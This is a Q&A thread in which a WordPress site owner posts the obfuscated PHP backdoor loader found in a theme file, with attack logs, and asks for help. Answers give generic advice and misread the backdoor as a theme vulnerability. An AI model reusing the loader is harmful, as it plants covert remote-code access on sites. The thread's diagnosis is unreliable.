# Wordpress vulnerability issue

Tags: php, wordpress, security

My wordpress website have just been hacked and after looking at logs I saw that they exploited this file: www/wp-content/themes/mytheme/style.php

When browse this link www.mywebsite.com/wp-content/themes/mytheme/style.php I find an input field with a button. So I guess that's where they uploaded their shell script.

```
function pre_term_name( $wp_kses_data, $wp_nonce ) {
$kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
$filter = base64_decode( $kses_str );
$md5 = strrev( $wp_nonce );
$sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
$wp_nonce = md5( $wp_nonce ). $sub;
$preparefunc = 'gzinflate';
$i = 0; do {
    $ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
    $filter[$i] = chr( $ord % 256 );
    $wp_nonce .= $filter[$i]; $i++;
} while ($i < strlen( $filter ));
return @$preparefunc( $filter );
} 

$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= "&gt;"/></form>';
```

How can I solve this vulnerability? Thanks

logs:

```
195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
```

Comment: The form in `$wp_auth_check` doesn't have a file uloader. Can you include more code from "style.php" and the relevant log entries ?

Comment: Hi Adam, I have included more code from style.php and also some logs line that I think are related to the attack. Thanks for your help.

Comment: I actually commented this line for the moment as I don't know what to do. $wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= "&gt;"/></form>';

Comment: Did you insall this file ? Most wp themes have a style.css and a fiew php files like index.php, functions.php, etc. It might be legitimate but it looks a bit suspicious. Also you're right about the logs, it seems like the attacker used "style.php" to upload a shell. If "style.php" is part of the theme you should contact the developer and make him aware of the vulnerability.

Comment: If you are concearned about security you can search for infections in recently modified files, and if you have a recent, _clean_ backup use it. I wouldn't get too paranoid tough, these things happen..

Comment: Thanks for you support Adam. I will contact the theme developer and make him aware of this situation.

Answer (score 0):

That line is where the input would be. The vulnerability would be whatever that is posting to. It appears that the action is blank and so I'd assume there is a jQuery/AJAX call that is stopping the submission and passing the data. That would be where to check. From there you will know where the data is actually being posted and a query is being executed. Check that the query is using PDO and/or the inputs are sanitized.

As a general "helper" with WP security though, I like the Sucuri WP plugin.

Answer (score -1):

You can use WordPress Security Plugins for example: WordFence, BulletProof Security, Sucuri Security, iThemes Security, Acunetix WP SecurityScan

and 
check this pages:[threats](http://www.esecurityplanet.com/open-source-security/top-5-wordpress-vulnerabilities-and-how-to-fix-them.html)

[Security Vulnerabilities](https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/)